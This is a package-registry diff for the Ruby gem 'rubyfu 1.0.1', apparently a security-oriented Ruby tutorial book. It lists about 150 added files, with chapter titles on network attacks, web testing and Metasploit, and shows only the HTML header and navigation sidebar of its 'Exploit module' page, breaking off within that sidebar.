rubyfu 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (151) hide show
  1. checksums.yaml +7 -0
  2. data/README.md +96 -0
  3. data/Rakefile +1 -0
  4. data/_book/beginners.html +1299 -0
  5. data/_book/contribution.html +1350 -0
  6. data/_book/contributors/Ruby_Loves_Us.jpg +0 -0
  7. data/_book/contributors/index.html +1294 -0
  8. data/_book/contributors/todo.html +1293 -0
  9. data/_book/cover.jpg +0 -0
  10. data/_book/faqs/index.html +1308 -0
  11. data/_book/files/module03/dns_spoofing_dns-query.pcap +0 -0
  12. data/_book/files/module03/dns_spoofing_dns-req_res.pcap.pcapng +0 -0
  13. data/_book/files/module06/ftp.pcap +0 -0
  14. data/_book/files/module06/packets.pcap +0 -0
  15. data/_book/gitbook/app.js +25001 -0
  16. data/_book/gitbook/fonts/fontawesome/FontAwesome.otf +0 -0
  17. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.eot +0 -0
  18. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.svg +504 -0
  19. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.ttf +0 -0
  20. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.woff +0 -0
  21. data/_book/gitbook/images/apple-touch-icon-precomposed-152.png +0 -0
  22. data/_book/gitbook/images/favicon.ico +0 -0
  23. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/README.md +19 -0
  24. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/index.js +57 -0
  25. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/package.json +47 -0
  26. data/_book/gitbook/plugins/gitbook-plugin-anchors/plugin.css +26 -0
  27. data/_book/gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js +30 -0
  28. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css +28 -0
  29. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js +68 -0
  30. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/buttons.js +151 -0
  31. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/website.css +291 -0
  32. data/_book/gitbook/plugins/gitbook-plugin-highlight/ebook.css +131 -0
  33. data/_book/gitbook/plugins/gitbook-plugin-highlight/website.css +426 -0
  34. data/_book/gitbook/plugins/gitbook-plugin-search/lunr.min.js +7 -0
  35. data/_book/gitbook/plugins/gitbook-plugin-search/search.css +27 -0
  36. data/_book/gitbook/plugins/gitbook-plugin-search/search.js +135 -0
  37. data/_book/gitbook/plugins/gitbook-plugin-sharing/buttons.js +93 -0
  38. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.css +22 -0
  39. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.js +122 -0
  40. data/_book/gitbook/style.css +9 -0
  41. data/_book/googlec55db2d603c3da8b.html +1 -0
  42. data/_book/images/module02/Cryptography__wiringdiagram.png +0 -0
  43. data/_book/images/module02/packaging__ocra1.png +0 -0
  44. data/_book/images/module03/dns_spoofing_wireshark1.png +0 -0
  45. data/_book/images/module03/dns_spoofing_wireshark2.png +0 -0
  46. data/_book/images/module04/webfu__post_form1.png +0 -0
  47. data/_book/images/module04/webfu__proxy2.png +0 -0
  48. data/_book/images/module04/webfu__twitterAPI1.png +0 -0
  49. data/_book/images/module04/webfu__xmlrpc1.png +0 -0
  50. data/_book/images/module05/msf_template1.png +0 -0
  51. data/_book/images/module06/win-foren__winreg1.png +0 -0
  52. data/_book/images/other/Ruby_Loves_Us.jpg +0 -0
  53. data/_book/images/other/cover.jpg +0 -0
  54. data/_book/images/other/cover_small.jpg +0 -0
  55. data/_book/images/other/logo.png +0 -0
  56. data/_book/images/other/rubyfu.png +0 -0
  57. data/_book/images/other/rubyfu1.png +0 -0
  58. data/_book/images/other/rubyfu3.png +0 -0
  59. data/_book/images/other/rubyfu4.png +0 -0
  60. data/_book/images/other/rubyfu_.png +0 -0
  61. data/_book/index.html +1284 -0
  62. data/_book/module_0x1__basic_ruby_kung_fu/array.html +1297 -0
  63. data/_book/module_0x1__basic_ruby_kung_fu/conversion.html +1386 -0
  64. data/_book/module_0x1__basic_ruby_kung_fu/extraction.html +1346 -0
  65. data/_book/module_0x1__basic_ruby_kung_fu/index.html +1367 -0
  66. data/_book/module_0x1__basic_ruby_kung_fu/string.html +1451 -0
  67. data/_book/module_0x2__system_kung_fu/command_execution.html +1348 -0
  68. data/_book/module_0x2__system_kung_fu/cryptography.html +1396 -0
  69. data/_book/module_0x2__system_kung_fu/email.html +1352 -0
  70. data/_book/module_0x2__system_kung_fu/file_manipulation.html +1371 -0
  71. data/_book/module_0x2__system_kung_fu/index.html +1557 -0
  72. data/_book/module_0x2__system_kung_fu/ncatrb.html +1424 -0
  73. data/_book/module_0x2__system_kung_fu/packaging.md +1 -0
  74. data/_book/module_0x2__system_kung_fu/packaging__ocra1.png +0 -0
  75. data/_book/module_0x2__system_kung_fu/parsing_html,_xml,_json.html +1395 -0
  76. data/_book/module_0x2__system_kung_fu/rce_as_a_service.html +1336 -0
  77. data/_book/module_0x2__system_kung_fu/smtp_enumeration.html +1308 -0
  78. data/_book/module_0x2__system_kung_fu/system_shell.html +1299 -0
  79. data/_book/module_0x2__system_kung_fu/virustotal.html +1318 -0
  80. data/_book/module_0x3__network_kung_fu/Remote_shell.md +19 -0
  81. data/_book/module_0x3__network_kung_fu/arp_spoofing.html +1420 -0
  82. data/_book/module_0x3__network_kung_fu/dns.html +1315 -0
  83. data/_book/module_0x3__network_kung_fu/dns_bruteforce.md +49 -0
  84. data/_book/module_0x3__network_kung_fu/dns_enumeration.html +1371 -0
  85. data/_book/module_0x3__network_kung_fu/dns_spoofing.html +1694 -0
  86. data/_book/module_0x3__network_kung_fu/dns_spoofing_wireshark2.png +0 -0
  87. data/_book/module_0x3__network_kung_fu/ftp.html +1287 -0
  88. data/_book/module_0x3__network_kung_fu/index.html +1392 -0
  89. data/_book/module_0x3__network_kung_fu/network_scanning.html +1339 -0
  90. data/_book/module_0x3__network_kung_fu/network_traffic_analysis.html +1356 -0
  91. data/_book/module_0x3__network_kung_fu/nmap.html +1355 -0
  92. data/_book/module_0x3__network_kung_fu/oracle_tns_enum1.png +0 -0
  93. data/_book/module_0x3__network_kung_fu/packet_manipulation.html +1386 -0
  94. data/_book/module_0x3__network_kung_fu/ruby_socket.html +1553 -0
  95. data/_book/module_0x3__network_kung_fu/snmp_enumeration.html +1314 -0
  96. data/_book/module_0x3__network_kung_fu/ssh.html +1461 -0
  97. data/_book/module_0x3__network_kung_fu/ssid_finder.html +1324 -0
  98. data/_book/module_0x3__network_kung_fu/tns_enumeration.html +1505 -0
  99. data/_book/module_0x4__web_kung_fu/browser_manipulation.html +1630 -0
  100. data/_book/module_0x4__web_kung_fu/databases.html +1531 -0
  101. data/_book/module_0x4__web_kung_fu/extending_burpsuite.html +1303 -0
  102. data/_book/module_0x4__web_kung_fu/index.html +1536 -0
  103. data/_book/module_0x4__web_kung_fu/interacting_with_apis.html +1271 -0
  104. data/_book/module_0x4__web_kung_fu/ruby2javascript.html +1303 -0
  105. data/_book/module_0x4__web_kung_fu/sql_injection_scanner.html +1489 -0
  106. data/_book/module_0x4__web_kung_fu/twitter_api.html +1328 -0
  107. data/_book/module_0x4__web_kung_fu/web_servcies_and_apis.html +1291 -0
  108. data/_book/module_0x4__web_kung_fu/web_server_and_proxy.html +1370 -0
  109. data/_book/module_0x4__web_kung_fu/web_services.html +1394 -0
  110. data/_book/module_0x4__web_kung_fu/webfu__burp-ext1.png +0 -0
  111. data/_book/module_0x4__web_kung_fu/webfu__burp-ext2.png +0 -0
  112. data/_book/module_0x4__web_kung_fu/webfu__burp_setenv1.png +0 -0
  113. data/_book/module_0x4__web_kung_fu/webfu__proxy2.png +0 -0
  114. data/_book/module_0x4__web_kung_fu/webfu__twitterAPI1.png +0 -0
  115. data/_book/module_0x4__web_kung_fu/webfu__xmlrpc1.png +0 -0
  116. data/_book/module_0x4__web_kung_fu/wordpress_api.html +1543 -0
  117. data/_book/module_0x5__exploitation_kung_fu/MSF-struct.png +0 -0
  118. data/_book/module_0x5__exploitation_kung_fu/auxiliary_module.html +1870 -0
  119. data/_book/module_0x5__exploitation_kung_fu/exploit_module.html +1523 -0
  120. data/_book/module_0x5__exploitation_kung_fu/extensions.html +1466 -0
  121. data/_book/module_0x5__exploitation_kung_fu/fuzzer.html +1325 -0
  122. data/_book/module_0x5__exploitation_kung_fu/index.html +1319 -0
  123. data/_book/module_0x5__exploitation_kung_fu/metasm.html +1322 -0
  124. data/_book/module_0x5__exploitation_kung_fu/metasploit.html +1441 -0
  125. data/_book/module_0x5__exploitation_kung_fu/meterpreter.html +1327 -0
  126. data/_book/module_0x5__exploitation_kung_fu/meterpreter_scripting.html +1318 -0
  127. data/_book/module_0x5__exploitation_kung_fu/msf_meter_railgun1.png +0 -0
  128. data/_book/module_0x5__exploitation_kung_fu/msf_template1.png +0 -0
  129. data/_book/module_0x5__exploitation_kung_fu/railgun_api_extension.html +1300 -0
  130. data/_book/module_0x6__forensic/android_forensic.html +1356 -0
  131. data/_book/module_0x6__forensic/index.html +1332 -0
  132. data/_book/module_0x6__forensic/parsing_log_files.html +1375 -0
  133. data/_book/module_0x6__forensic/win-foren__winreg1.png +0 -0
  134. data/_book/module_0x6__forensic/windows_forensic.html +1289 -0
  135. data/_book/package.json +5 -0
  136. data/_book/references/index.html +1338 -0
  137. data/_book/required_gems.html +1342 -0
  138. data/_book/rubyfu_.png +0 -0
  139. data/_book/search_index.json +1 -0
  140. data/_book/styles/ebook.css +1 -0
  141. data/_book/styles/epub.css +1 -0
  142. data/_book/styles/header.js +5 -0
  143. data/_book/styles/mobi.css +1 -0
  144. data/_book/styles/pdf.css +1 -0
  145. data/_book/styles/website.css +41 -0
  146. data/bin/rubyfu +48 -0
  147. data/lib/rubyfu.rb +36 -0
  148. data/lib/rubyfu/browse.rb +35 -0
  149. data/lib/rubyfu/version.rb +3 -0
  150. data/lib/rubyfu/webserver.rb +30 -0
  151. metadata +210 -0
data/_book/module_0x5__exploitation_kung_fu/exploit_module.html ADDED
@@ -0,0 +1,1523 @@
1
+ <!DOCTYPE HTML>
2
+ <html lang="en" >
3
+
4
+ <head>
5
+
6
+ <meta charset="UTF-8">
7
+ <meta http-equiv="X-UA-Compatible" content="IE=edge" />
8
+ <title>Exploit module | RubyFu</title>
9
+ <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
10
+ <meta name="description" content="">
11
+ <meta name="generator" content="GitBook 2.6.2">
12
+
13
+
14
+ <meta name="HandheldFriendly" content="true"/>
15
+ <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
16
+ <meta name="apple-mobile-web-app-capable" content="yes">
17
+ <meta name="apple-mobile-web-app-status-bar-style" content="black">
18
+ <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../gitbook/images/apple-touch-icon-precomposed-152.png">
19
+ <link rel="shortcut icon" href="../gitbook/images/favicon.ico" type="image/x-icon">
20
+
21
+ <link rel="stylesheet" href="../gitbook/style.css">
22
+
23
+
24
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-anchors/plugin.css">
25
+
26
+
27
+
28
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-splitter/splitter.css">
29
+
30
+
31
+
32
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css">
33
+
34
+
35
+
36
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-highlight/website.css">
37
+
38
+
39
+
40
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-search/search.css">
41
+
42
+
43
+
44
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-fontsettings/website.css">
45
+
46
+
47
+
48
+ <link rel="stylesheet" href="../styles/website.css">
49
+
50
+
51
+
52
+
53
+
54
+ <link rel="next" href="../module_0x5__exploitation_kung_fu/meterpreter.html" />
55
+
56
+
57
+ <link rel="prev" href="../module_0x5__exploitation_kung_fu/auxiliary_module.html" />
58
+
59
+
60
+ <script type="text/javascript" src="../styles/header.js"></script>
61
+ </head>
62
+ <body>
63
+
64
+
65
+ <div class="book"
66
+ data-level="5.2.2"
67
+ data-chapter-title="Exploit module"
68
+ data-filepath="module_0x5__exploitation_kung_fu/exploit_module.md"
69
+ data-basepath=".."
70
+ data-revision="Wed Jan 27 2016 09:00:51 GMT+0300 (AST)"
71
+ data-innerlanguage="">
72
+
73
+
74
+ <div class="book-summary">
75
+ <nav role="navigation">
76
+ <ul class="summary">
77
+
78
+
79
+
80
+
81
+
82
+
83
+
84
+
85
+
86
+ <li class="chapter " data-level="0" data-path="index.html">
87
+
88
+
89
+ <a href="../index.html">
90
+
91
+ <i class="fa fa-check"></i>
92
+
93
+ Module 0x0 | Introduction
94
+ </a>
95
+
96
+
97
+ <ul class="articles">
98
+
99
+
100
+ <li class="chapter " data-level="0.1" data-path="contribution.html">
101
+
102
+
103
+ <a href="../contribution.html">
104
+
105
+ <i class="fa fa-check"></i>
106
+
107
+ <b>0.1.</b>
108
+
109
+ Contribution
110
+ </a>
111
+
112
+
113
+ </li>
114
+
115
+ <li class="chapter " data-level="0.2" data-path="beginners.html">
116
+
117
+
118
+ <a href="../beginners.html">
119
+
120
+ <i class="fa fa-check"></i>
121
+
122
+ <b>0.2.</b>
123
+
124
+ Beginners
125
+ </a>
126
+
127
+
128
+ </li>
129
+
130
+ <li class="chapter " data-level="0.3" data-path="required_gems.html">
131
+
132
+
133
+ <a href="../required_gems.html">
134
+
135
+ <i class="fa fa-check"></i>
136
+
137
+ <b>0.3.</b>
138
+
139
+ Required Gems
140
+ </a>
141
+
142
+
143
+ </li>
144
+
145
+
146
+ </ul>
147
+
148
+ </li>
149
+
150
+ <li class="chapter " data-level="1" data-path="module_0x1__basic_ruby_kung_fu/index.html">
151
+
152
+
153
+ <a href="../module_0x1__basic_ruby_kung_fu/index.html">
154
+
155
+ <i class="fa fa-check"></i>
156
+
157
+ <b>1.</b>
158
+
159
+ Module 0x1 | Basic Ruby Kung Fu
160
+ </a>
161
+
162
+
163
+ <ul class="articles">
164
+
165
+
166
+ <li class="chapter " data-level="1.1" data-path="module_0x1__basic_ruby_kung_fu/string.html">
167
+
168
+
169
+ <a href="../module_0x1__basic_ruby_kung_fu/string.html">
170
+
171
+ <i class="fa fa-check"></i>
172
+
173
+ <b>1.1.</b>
174
+
175
+ String
176
+ </a>
177
+
178
+
179
+ <ul class="articles">
180
+
181
+
182
+ <li class="chapter " data-level="1.1.1" data-path="module_0x1__basic_ruby_kung_fu/conversion.html">
183
+
184
+
185
+ <a href="../module_0x1__basic_ruby_kung_fu/conversion.html">
186
+
187
+ <i class="fa fa-check"></i>
188
+
189
+ <b>1.1.1.</b>
190
+
191
+ Conversion
192
+ </a>
193
+
194
+
195
+ </li>
196
+
197
+ <li class="chapter " data-level="1.1.2" data-path="module_0x1__basic_ruby_kung_fu/extraction.html">
198
+
199
+
200
+ <a href="../module_0x1__basic_ruby_kung_fu/extraction.html">
201
+
202
+ <i class="fa fa-check"></i>
203
+
204
+ <b>1.1.2.</b>
205
+
206
+ Extraction
207
+ </a>
208
+
209
+
210
+ </li>
211
+
212
+
213
+ </ul>
214
+
215
+ </li>
216
+
217
+ <li class="chapter " data-level="1.2" data-path="module_0x1__basic_ruby_kung_fu/array.html">
218
+
219
+
220
+ <a href="../module_0x1__basic_ruby_kung_fu/array.html">
221
+
222
+ <i class="fa fa-check"></i>
223
+
224
+ <b>1.2.</b>
225
+
226
+ Array
227
+ </a>
228
+
229
+
230
+ </li>
231
+
232
+
233
+ </ul>
234
+
235
+ </li>
236
+
237
+ <li class="chapter " data-level="2" data-path="module_0x2__system_kung_fu/index.html">
238
+
239
+
240
+ <a href="../module_0x2__system_kung_fu/index.html">
241
+
242
+ <i class="fa fa-check"></i>
243
+
244
+ <b>2.</b>
245
+
246
+ Module 0x2 | System Kung Fu
247
+ </a>
248
+
249
+
250
+ <ul class="articles">
251
+
252
+
253
+ <li class="chapter " data-level="2.1" data-path="module_0x2__system_kung_fu/command_execution.html">
254
+
255
+
256
+ <a href="../module_0x2__system_kung_fu/command_execution.html">
257
+
258
+ <i class="fa fa-check"></i>
259
+
260
+ <b>2.1.</b>
261
+
262
+ Command Execution
263
+ </a>
264
+
265
+
266
+ </li>
267
+
268
+ <li class="chapter " data-level="2.2" data-path="module_0x2__system_kung_fu/file_manipulation.html">
269
+
270
+
271
+ <a href="../module_0x2__system_kung_fu/file_manipulation.html">
272
+
273
+ <i class="fa fa-check"></i>
274
+
275
+ <b>2.2.</b>
276
+
277
+ File manipulation
278
+ </a>
279
+
280
+
281
+ <ul class="articles">
282
+
283
+
284
+ <li class="chapter " data-level="2.2.1" data-path="module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
285
+
286
+
287
+ <a href="../module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
288
+
289
+ <i class="fa fa-check"></i>
290
+
291
+ <b>2.2.1.</b>
292
+
293
+ Parsing HTML, XML, JSON
294
+ </a>
295
+
296
+
297
+ </li>
298
+
299
+
300
+ </ul>
301
+
302
+ </li>
303
+
304
+ <li class="chapter " data-level="2.3" data-path="module_0x2__system_kung_fu/cryptography.html">
305
+
306
+
307
+ <a href="../module_0x2__system_kung_fu/cryptography.html">
308
+
309
+ <i class="fa fa-check"></i>
310
+
311
+ <b>2.3.</b>
312
+
313
+ Cryptography
314
+ </a>
315
+
316
+
317
+ </li>
318
+
319
+ <li class="chapter " data-level="2.4" data-path="module_0x2__system_kung_fu/system_shell.html">
320
+
321
+
322
+ <a href="../module_0x2__system_kung_fu/system_shell.html">
323
+
324
+ <i class="fa fa-check"></i>
325
+
326
+ <b>2.4.</b>
327
+
328
+ Remote Shell
329
+ </a>
330
+
331
+
332
+ <ul class="articles">
333
+
334
+
335
+ <li class="chapter " data-level="2.4.1" data-path="module_0x2__system_kung_fu/ncatrb.html">
336
+
337
+
338
+ <a href="../module_0x2__system_kung_fu/ncatrb.html">
339
+
340
+ <i class="fa fa-check"></i>
341
+
342
+ <b>2.4.1.</b>
343
+
344
+ Ncat.rb
345
+ </a>
346
+
347
+
348
+ </li>
349
+
350
+ <li class="chapter " data-level="2.4.2" data-path="module_0x2__system_kung_fu/rce_as_a_service.html">
351
+
352
+
353
+ <a href="../module_0x2__system_kung_fu/rce_as_a_service.html">
354
+
355
+ <i class="fa fa-check"></i>
356
+
357
+ <b>2.4.2.</b>
358
+
359
+ RCE as a Service
360
+ </a>
361
+
362
+
363
+ </li>
364
+
365
+
366
+ </ul>
367
+
368
+ </li>
369
+
370
+ <li class="chapter " data-level="2.5" data-path="module_0x2__system_kung_fu/virustotal.html">
371
+
372
+
373
+ <a href="../module_0x2__system_kung_fu/virustotal.html">
374
+
375
+ <i class="fa fa-check"></i>
376
+
377
+ <b>2.5.</b>
378
+
379
+ VirusTotal
380
+ </a>
381
+
382
+
383
+ </li>
384
+
385
+
386
+ </ul>
387
+
388
+ </li>
389
+
390
+ <li class="chapter " data-level="3" data-path="module_0x3__network_kung_fu/index.html">
391
+
392
+
393
+ <a href="../module_0x3__network_kung_fu/index.html">
394
+
395
+ <i class="fa fa-check"></i>
396
+
397
+ <b>3.</b>
398
+
399
+ Module 0x3 | Network Kung Fu
400
+ </a>
401
+
402
+
403
+ <ul class="articles">
404
+
405
+
406
+ <li class="chapter " data-level="3.1" data-path="module_0x3__network_kung_fu/ruby_socket.html">
407
+
408
+
409
+ <a href="../module_0x3__network_kung_fu/ruby_socket.html">
410
+
411
+ <i class="fa fa-check"></i>
412
+
413
+ <b>3.1.</b>
414
+
415
+ Ruby Socket
416
+ </a>
417
+
418
+
419
+ </li>
420
+
421
+ <li class="chapter " data-level="3.2" data-path="module_0x3__network_kung_fu/ssid_finder.html">
422
+
423
+
424
+ <a href="../module_0x3__network_kung_fu/ssid_finder.html">
425
+
426
+ <i class="fa fa-check"></i>
427
+
428
+ <b>3.2.</b>
429
+
430
+ SSID Finder
431
+ </a>
432
+
433
+
434
+ </li>
435
+
436
+ <li class="chapter " data-level="3.3" data-path="module_0x3__network_kung_fu/ftp.html">
437
+
438
+
439
+ <a href="../module_0x3__network_kung_fu/ftp.html">
440
+
441
+ <i class="fa fa-check"></i>
442
+
443
+ <b>3.3.</b>
444
+
445
+ FTP
446
+ </a>
447
+
448
+
449
+ </li>
450
+
451
+ <li class="chapter " data-level="3.4" data-path="module_0x3__network_kung_fu/ssh.html">
452
+
453
+
454
+ <a href="../module_0x3__network_kung_fu/ssh.html">
455
+
456
+ <i class="fa fa-check"></i>
457
+
458
+ <b>3.4.</b>
459
+
460
+ SSH
461
+ </a>
462
+
463
+
464
+ </li>
465
+
466
+ <li class="chapter " data-level="3.5" data-path="module_0x2__system_kung_fu/email.html">
467
+
468
+
469
+ <a href="../module_0x2__system_kung_fu/email.html">
470
+
471
+ <i class="fa fa-check"></i>
472
+
473
+ <b>3.5.</b>
474
+
475
+ Email
476
+ </a>
477
+
478
+
479
+ <ul class="articles">
480
+
481
+
482
+ <li class="chapter " data-level="3.5.1" data-path="module_0x2__system_kung_fu/smtp_enumeration.html">
483
+
484
+
485
+ <a href="../module_0x2__system_kung_fu/smtp_enumeration.html">
486
+
487
+ <i class="fa fa-check"></i>
488
+
489
+ <b>3.5.1.</b>
490
+
491
+ SMTP Enumeration
492
+ </a>
493
+
494
+
495
+ </li>
496
+
497
+
498
+ </ul>
499
+
500
+ </li>
501
+
502
+ <li class="chapter " data-level="3.6" data-path="module_0x3__network_kung_fu/network_scanning.html">
503
+
504
+
505
+ <a href="../module_0x3__network_kung_fu/network_scanning.html">
506
+
507
+ <i class="fa fa-check"></i>
508
+
509
+ <b>3.6.</b>
510
+
511
+ Network Scanning
512
+ </a>
513
+
514
+
515
+ <ul class="articles">
516
+
517
+
518
+ <li class="chapter " data-level="3.6.1" data-path="module_0x3__network_kung_fu/nmap.html">
519
+
520
+
521
+ <a href="../module_0x3__network_kung_fu/nmap.html">
522
+
523
+ <i class="fa fa-check"></i>
524
+
525
+ <b>3.6.1.</b>
526
+
527
+ Nmap
528
+ </a>
529
+
530
+
531
+ </li>
532
+
533
+
534
+ </ul>
535
+
536
+ </li>
537
+
538
+ <li class="chapter " data-level="3.7" data-path="module_0x3__network_kung_fu/dns.html">
539
+
540
+
541
+ <a href="../module_0x3__network_kung_fu/dns.html">
542
+
543
+ <i class="fa fa-check"></i>
544
+
545
+ <b>3.7.</b>
546
+
547
+ DNS
548
+ </a>
549
+
550
+
551
+ <ul class="articles">
552
+
553
+
554
+ <li class="chapter " data-level="3.7.1" data-path="module_0x3__network_kung_fu/dns_enumeration.html">
555
+
556
+
557
+ <a href="../module_0x3__network_kung_fu/dns_enumeration.html">
558
+
559
+ <i class="fa fa-check"></i>
560
+
561
+ <b>3.7.1.</b>
562
+
563
+ DNS Enumeration
564
+ </a>
565
+
566
+
567
+ </li>
568
+
569
+
570
+ </ul>
571
+
572
+ </li>
573
+
574
+ <li class="chapter " data-level="3.8" data-path="module_0x3__network_kung_fu/snmp_enumeration.html">
575
+
576
+
577
+ <a href="../module_0x3__network_kung_fu/snmp_enumeration.html">
578
+
579
+ <i class="fa fa-check"></i>
580
+
581
+ <b>3.8.</b>
582
+
583
+ SNMP Enumeration
584
+ </a>
585
+
586
+
587
+ </li>
588
+
589
+ <li class="chapter " data-level="3.9" data-path="module_0x3__network_kung_fu/tns_enumeration.html">
590
+
591
+
592
+ <a href="../module_0x3__network_kung_fu/tns_enumeration.html">
593
+
594
+ <i class="fa fa-check"></i>
595
+
596
+ <b>3.9.</b>
597
+
598
+ Oracle TNS Enumeration
599
+ </a>
600
+
601
+
602
+ </li>
603
+
604
+ <li class="chapter " data-level="3.10" data-path="module_0x3__network_kung_fu/packet_manipulation.html">
605
+
606
+
607
+ <a href="../module_0x3__network_kung_fu/packet_manipulation.html">
608
+
609
+ <i class="fa fa-check"></i>
610
+
611
+ <b>3.10.</b>
612
+
613
+ Packet manipulation
614
+ </a>
615
+
616
+
617
+ <ul class="articles">
618
+
619
+
620
+ <li class="chapter " data-level="3.10.1" data-path="module_0x3__network_kung_fu/arp_spoofing.html">
621
+
622
+
623
+ <a href="../module_0x3__network_kung_fu/arp_spoofing.html">
624
+
625
+ <i class="fa fa-check"></i>
626
+
627
+ <b>3.10.1.</b>
628
+
629
+ ARP Spoofing
630
+ </a>
631
+
632
+
633
+ </li>
634
+
635
+ <li class="chapter " data-level="3.10.2" data-path="module_0x3__network_kung_fu/dns_spoofing.html">
636
+
637
+
638
+ <a href="../module_0x3__network_kung_fu/dns_spoofing.html">
639
+
640
+ <i class="fa fa-check"></i>
641
+
642
+ <b>3.10.2.</b>
643
+
644
+ DNS Spoofing
645
+ </a>
646
+
647
+
648
+ </li>
649
+
650
+
651
+ </ul>
652
+
653
+ </li>
654
+
655
+
656
+ </ul>
657
+
658
+ </li>
659
+
660
+ <li class="chapter " data-level="4" data-path="module_0x4__web_kung_fu/index.html">
661
+
662
+
663
+ <a href="../module_0x4__web_kung_fu/index.html">
664
+
665
+ <i class="fa fa-check"></i>
666
+
667
+ <b>4.</b>
668
+
669
+ Module 0x4 | Web Kung Fu
670
+ </a>
671
+
672
+
673
+ <ul class="articles">
674
+
675
+
676
+ <li class="chapter " data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
677
+
678
+
679
+ <a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
680
+
681
+ <i class="fa fa-check"></i>
682
+
683
+ <b>4.1.</b>
684
+
685
+ SQL Injection Scanner
686
+ </a>
687
+
688
+
689
+ </li>
690
+
691
+ <li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
692
+
693
+
694
+ <a href="../module_0x4__web_kung_fu/databases.html">
695
+
696
+ <i class="fa fa-check"></i>
697
+
698
+ <b>4.2.</b>
699
+
700
+ Databases
701
+ </a>
702
+
703
+
704
+ </li>
705
+
706
+ <li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
707
+
708
+
709
+ <a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
710
+
711
+ <i class="fa fa-check"></i>
712
+
713
+ <b>4.3.</b>
714
+
715
+ Extending Burp Suite
716
+ </a>
717
+
718
+
719
+ </li>
720
+
721
+ <li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
722
+
723
+
724
+ <a href="../module_0x4__web_kung_fu/browser_manipulation.html">
725
+
726
+ <i class="fa fa-check"></i>
727
+
728
+ <b>4.4.</b>
729
+
730
+ Browser Manipulation
731
+ </a>
732
+
733
+
734
+ </li>
735
+
736
+ <li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
737
+
738
+
739
+ <a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
740
+
741
+ <i class="fa fa-check"></i>
742
+
743
+ <b>4.5.</b>
744
+
745
+ Web Services and APIs
746
+ </a>
747
+
748
+
749
+ <ul class="articles">
750
+
751
+
752
+ <li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
753
+
754
+
755
+ <a href="../module_0x4__web_kung_fu/web_services.html">
756
+
757
+ <i class="fa fa-check"></i>
758
+
759
+ <b>4.5.1.</b>
760
+
761
+ Interacting with Web Services
762
+ </a>
763
+
764
+
765
+ </li>
766
+
767
+ <li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
768
+
769
+
770
+ <a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
771
+
772
+ <i class="fa fa-check"></i>
773
+
774
+ <b>4.5.2.</b>
775
+
776
+ Interacting with APIs
777
+ </a>
778
+
779
+
780
+ <ul class="articles">
781
+
782
+
783
+ <li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
784
+
785
+
786
+ <a href="../module_0x4__web_kung_fu/wordpress_api.html">
787
+
788
+ <i class="fa fa-check"></i>
789
+
790
+ <b>4.5.2.1.</b>
791
+
792
+ WordPress API
793
+ </a>
794
+
795
+
796
+ </li>
797
+
798
+ <li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
799
+
800
+
801
+ <a href="../module_0x4__web_kung_fu/twitter_api.html">
802
+
803
+ <i class="fa fa-check"></i>
804
+
805
+ <b>4.5.2.2.</b>
806
+
807
+ Twitter API
808
+ </a>
809
+
810
+
811
+ </li>
812
+
813
+
814
+ </ul>
815
+
816
+ </li>
817
+
818
+
819
+ </ul>
820
+
821
+ </li>
822
+
823
+ <li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
824
+
825
+
826
+ <a href="../module_0x4__web_kung_fu/ruby2javascript.html">
827
+
828
+ <i class="fa fa-check"></i>
829
+
830
+ <b>4.6.</b>
831
+
832
+ Ruby 2 JavaScript
833
+ </a>
834
+
835
+
836
+ </li>
837
+
838
+ <li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
839
+
840
+
841
+ <a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
842
+
843
+ <i class="fa fa-check"></i>
844
+
845
+ <b>4.7.</b>
846
+
847
+ Web Server and Proxy
848
+ </a>
849
+
850
+
851
+ </li>
852
+
853
+
854
+ </ul>
855
+
856
+ </li>
857
+
858
+ <li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
859
+
860
+
861
+ <a href="../module_0x5__exploitation_kung_fu/index.html">
862
+
863
